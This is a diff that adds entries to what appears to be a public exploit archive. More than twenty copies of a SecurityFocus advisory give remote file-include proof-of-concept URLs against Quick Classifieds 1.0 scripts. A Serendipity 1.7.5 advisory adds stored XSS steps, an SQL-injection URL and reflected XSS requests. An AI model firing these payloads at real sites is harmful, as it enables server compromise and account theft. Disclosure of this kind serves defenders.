@@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/28417/info + +Quick Classifieds is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. + +Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible. + +Quick Classifieds 1.0 is vulnerable; other versions may also be affected. + +http://www.example.com/QuickSystems_path/controlpannel/alterCats.php3?DOCUMENT_ROOT=ZoRLu.txt? \ No newline at end of file diff --git a/platforms/php/webapps/31493.txt b/platforms/php/webapps/31493.txt new file mode 100755 index 000000000..c37230f8d --- /dev/null +++ b/platforms/php/webapps/31493.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/28417/info + +Quick Classifieds is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. + +Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible. + +Quick Classifieds 1.0 is vulnerable; other versions may also be affected. + +http://www.example.com/QuickSystems_path/controlpannel/alterFeatured.php3?DOCUMENT_ROOT=ZoRLu.txt? \ No newline at end of file diff --git a/platforms/php/webapps/31494.txt b/platforms/php/webapps/31494.txt new file mode 100755 index 000000000..a97f06428 --- /dev/null +++ b/platforms/php/webapps/31494.txt 
@@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/28417/info + +Quick Classifieds is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. + +Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible. + +Quick Classifieds 1.0 is vulnerable; other versions may also be affected. + +http://www.example.com/QuickSystems_path/controlpannel/alterHomepage.php3?DOCUMENT_ROOT=ZoRLu.txt? \ No newline at end of file diff --git a/platforms/php/webapps/31495.txt b/platforms/php/webapps/31495.txt new file mode 100755 index 000000000..908f1bacc --- /dev/null +++ b/platforms/php/webapps/31495.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/28417/info + +Quick Classifieds is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. + +Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible. + +Quick Classifieds 1.0 is vulnerable; other versions may also be affected. + +http://www.example.com/QuickSystems_path/controlpannel/alterNews.php3?DOCUMENT_ROOT=ZoRLu.txt? \ No newline at end of file diff --git a/platforms/php/webapps/31496.txt b/platforms/php/webapps/31496.txt new file mode 100755 index 000000000..978474b9b --- /dev/null +++ b/platforms/php/webapps/31496.txt 
@@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/28417/info + +Quick Classifieds is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. + +Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible. + +Quick Classifieds 1.0 is vulnerable; other versions may also be affected. + +http://www.example.com/QuickSystems_path/controlpannel/alterTheme.php3?DOCUMENT_ROOT=ZoRLu.txt? \ No newline at end of file diff --git a/platforms/php/webapps/31497.txt b/platforms/php/webapps/31497.txt new file mode 100755 index 000000000..6aeded045 --- /dev/null +++ b/platforms/php/webapps/31497.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/28417/info + +Quick Classifieds is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. + +Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible. + +Quick Classifieds 1.0 is vulnerable; other versions may also be affected. + +http://www.example.com/QuickSystems_path/controlpannel/color_help.php3?DOCUMENT_ROOT=ZoRLu.txt? \ No newline at end of file diff --git a/platforms/php/webapps/31498.txt b/platforms/php/webapps/31498.txt new file mode 100755 index 000000000..0d8086084 --- /dev/null +++ b/platforms/php/webapps/31498.txt 
@@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/28417/info + +Quick Classifieds is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. + +Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible. + +Quick Classifieds 1.0 is vulnerable; other versions may also be affected. + +http://www.example.com/QuickSystems_path/controlpannel/createdb.php3?DOCUMENT_ROOT=ZoRLu.txt? \ No newline at end of file diff --git a/platforms/php/webapps/31499.txt b/platforms/php/webapps/31499.txt new file mode 100755 index 000000000..6c69e7589 --- /dev/null +++ b/platforms/php/webapps/31499.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/28417/info + +Quick Classifieds is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. + +Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible. + +Quick Classifieds 1.0 is vulnerable; other versions may also be affected. + +http://www.example.com/QuickSystems_path/controlpannel/createFeatured.php3?DOCUMENT_ROOT=ZoRLu.txt? \ No newline at end of file diff --git a/platforms/php/webapps/31500.txt b/platforms/php/webapps/31500.txt new file mode 100755 index 000000000..c0f51e842 --- /dev/null +++ b/platforms/php/webapps/31500.txt 
@@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/28417/info + +Quick Classifieds is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. + +Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible. + +Quick Classifieds 1.0 is vulnerable; other versions may also be affected. + +http://www.example.com/QuickSystems_path/controlpannel/createHomepage.php3?DOCUMENT_ROOT=ZoRLu.txt? \ No newline at end of file diff --git a/platforms/php/webapps/31501.txt b/platforms/php/webapps/31501.txt new file mode 100755 index 000000000..c1fb710f0 --- /dev/null +++ b/platforms/php/webapps/31501.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/28417/info + +Quick Classifieds is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. + +Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible. + +Quick Classifieds 1.0 is vulnerable; other versions may also be affected. + +http://www.example.com/QuickSystems_path/controlpannel/createL.php3?DOCUMENT_ROOT=ZoRLu.txt? \ No newline at end of file diff --git a/platforms/php/webapps/31502.txt b/platforms/php/webapps/31502.txt new file mode 100755 index 000000000..fa6b4ae5a --- /dev/null +++ b/platforms/php/webapps/31502.txt 
@@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/28417/info + +Quick Classifieds is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. + +Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible. + +Quick Classifieds 1.0 is vulnerable; other versions may also be affected. + +http://www.example.com/QuickSystems_path/controlpannel/createM.php3?DOCUMENT_ROOT=ZoRLu.txt? \ No newline at end of file diff --git a/platforms/php/webapps/31503.txt b/platforms/php/webapps/31503.txt new file mode 100755 index 000000000..c15f9b559 --- /dev/null +++ b/platforms/php/webapps/31503.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/28417/info + +Quick Classifieds is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. + +Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible. + +Quick Classifieds 1.0 is vulnerable; other versions may also be affected. + +http://www.example.com/QuickSystems_path/controlpannel/createNews.php3?DOCUMENT_ROOT=ZoRLu.txt? \ No newline at end of file diff --git a/platforms/php/webapps/31504.txt b/platforms/php/webapps/31504.txt new file mode 100755 index 000000000..a72a7c39c --- /dev/null +++ b/platforms/php/webapps/31504.txt 
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/28417/info
+
+Quick Classifieds is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
+
+Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible.
+
+Quick Classifieds 1.0 is vulnerable; other versions may also be affected.
+
+http://www.example.com/QuickSystems_path/controlpannel/createP.php3?DOCUMENT_ROOT=ZoRLu.txt?
\ No newline at end of file
diff --git a/platforms/php/webapps/31505.txt b/platforms/php/webapps/31505.txt
new file mode 100755
index 000000000..1c1d1f81c
--- /dev/null
+++ b/platforms/php/webapps/31505.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/28417/info
+
+Quick Classifieds is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
+
+Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible.
+
+Quick Classifieds 1.0 is vulnerable; other versions may also be affected.
+
+http://www.example.com/QuickSystems_path/controlpannel/createS.php3?DOCUMENT_ROOT=ZoRLu.txt?
\ No newline at end of file
diff --git a/platforms/php/webapps/31506.txt b/platforms/php/webapps/31506.txt
new file mode 100755
index 000000000..37e060e22
--- /dev/null
+++ b/platforms/php/webapps/31506.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/28417/info
+
+Quick Classifieds is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
+
+Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible.
+
+Quick Classifieds 1.0 is vulnerable; other versions may also be affected.
+
+http://www.example.com/QuickSystems_path/controlpannel/createT.php3?DOCUMENT_ROOT=ZoRLu.txt?
\ No newline at end of file
diff --git a/platforms/php/webapps/31507.txt b/platforms/php/webapps/31507.txt
new file mode 100755
index 000000000..d0d8a8918
--- /dev/null
+++ b/platforms/php/webapps/31507.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/28417/info
+
+Quick Classifieds is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
+
+Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible.
+
+Quick Classifieds 1.0 is vulnerable; other versions may also be affected.
+
+http://www.example.com/QuickSystems_path/controlpannel/index.php3?DOCUMENT_ROOT=ZoRLu.txt?
\ No newline at end of file
diff --git a/platforms/php/webapps/31508.txt b/platforms/php/webapps/31508.txt
new file mode 100755
index 000000000..850de3f55
--- /dev/null
+++ b/platforms/php/webapps/31508.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/28417/info
+
+Quick Classifieds is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
+
+Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible.
+
+Quick Classifieds 1.0 is vulnerable; other versions may also be affected.
+
+http://www.example.com/QuickSystems_path/controlpannel/mailadmin.php3?DOCUMENT_ROOT=ZoRLu.txt?
\ No newline at end of file
diff --git a/platforms/php/webapps/31509.txt b/platforms/php/webapps/31509.txt
new file mode 100755
index 000000000..8b94b5c6d
--- /dev/null
+++ b/platforms/php/webapps/31509.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/28417/info
+
+Quick Classifieds is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
+
+Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible.
+
+Quick Classifieds 1.0 is vulnerable; other versions may also be affected.
+
+http://www.example.com/QuickSystems_path/controlpannel/setUp.php3?DOCUMENT_ROOT=ZoRLu.txt?
\ No newline at end of file
diff --git a/platforms/php/webapps/31510.txt b/platforms/php/webapps/31510.txt
new file mode 100755
index 000000000..f17640818
--- /dev/null
+++ b/platforms/php/webapps/31510.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/28417/info
+
+Quick Classifieds is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
+
+Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible.
+
+Quick Classifieds 1.0 is vulnerable; other versions may also be affected.
+
+http://www.example.com/QuickSystems_path/include/sendit.php3?DOCUMENT_ROOT=ZoRLu.txt?
\ No newline at end of file
diff --git a/platforms/php/webapps/31511.txt b/platforms/php/webapps/31511.txt
new file mode 100755
index 000000000..4b81c3dbf
--- /dev/null
+++ b/platforms/php/webapps/31511.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/28417/info
+
+Quick Classifieds is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
+
+Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible.
+
+Quick Classifieds 1.0 is vulnerable; other versions may also be affected.
+
+http://www.example.com/QuickSystems_path/include/sendit2.php3?DOCUMENT_ROOT=ZoRLu.txt?
\ No newline at end of file
diff --git a/platforms/php/webapps/31512.txt b/platforms/php/webapps/31512.txt
new file mode 100755
index 000000000..2076a7b16
--- /dev/null
+++ b/platforms/php/webapps/31512.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/28417/info
+
+Quick Classifieds is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
+
+Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible.
+
+Quick Classifieds 1.0 is vulnerable; other versions may also be affected.
+
+http://www.example.com/QuickSystems_path/include/adminHead.inc?DOCUMENT_ROOT=ZoRLu.txt?
\ No newline at end of file
diff --git a/platforms/php/webapps/31513.txt b/platforms/php/webapps/31513.txt
new file mode 100755
index 000000000..96c09975f
--- /dev/null
+++ b/platforms/php/webapps/31513.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/28417/info
+
+Quick Classifieds is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
+
+Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible.
+
+Quick Classifieds 1.0 is vulnerable; other versions may also be affected.
+
+http://www.example.com/QuickSystems_path/include/usersHead.inc?DOCUMENT_ROOT=ZoRLu.txt?
\ No newline at end of file
diff --git a/platforms/php/webapps/31514.txt b/platforms/php/webapps/31514.txt
new file mode 100755
index 000000000..11712b63d
--- /dev/null
+++ b/platforms/php/webapps/31514.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/28417/info
+
+Quick Classifieds is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
+
+Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible.
+
+Quick Classifieds 1.0 is vulnerable; other versions may also be affected.
+
+http://www.example.com/QuickSystems_path/style/default.scheme.inc?DOCUMENT_ROOT=ZoRLu.txt?
\ No newline at end of file
diff --git a/platforms/php/webapps/31516.txt b/platforms/php/webapps/31516.txt
new file mode 100755
index 000000000..b1ed73f89
--- /dev/null
+++ b/platforms/php/webapps/31516.txt
@@ -0,0 +1,74 @@
+Advisory: Serendipity 1.7.5 (Backend) - Multiple security vulnerabilities
+Advisory ID: SSCHADV2014-003
+Author: Stefan Schurtz
+Affected Software: Successfully tested on Serendipity 1.7.5
+Vendor URL: http://www.s9y.org/
+Vendor Status: fixed
+
+==========================
+Vulnerability Description
+==========================
+
+The Serendipity 1.7.5 backend is prone to multiple security vulnerabilities
+
+==========================
+PoC-Exploit
+==========================
+
+// Stored-XSS with "Real name"
+
+(1) Login as "Standard editor" user
+(2) Under "Personal Settings" set your "Real name" to ">
+
+The XSS will be executed for the Administrator if he manages the users (Backend -> Administration -> Manage users)
+
+// SQL-Injection - with "serendipity[install_plugin]"
+
+http://[target]/serendipity/serendipity_admin.php?serendipity[adminModule]=plugins&serendipity[pluginPath]=serendipity_event_spamblock&serendipity[install_plugin]=[SQLi]
+
+// Reflected XSS_1 - "serendipity[install_plugin]"
+
+http://[target]/s/serendipity/serendipity_admin.php?serendipity[adminModule]=plugins&serendipity[pluginPath]=&serendipity[install_plugin]=78524'%3b%2f%2f912
+
+// Reflected XSS_2 - "serendipity[id]"
+
+POST http://[target]/serendipity/serendipity_admin.php?
+
+serendipity%5Baction%5D=admin&serendipity%5BadminModule%5D=entries&serendipity%5BadminAction%5D=save&serendipity%5Bid%5D=">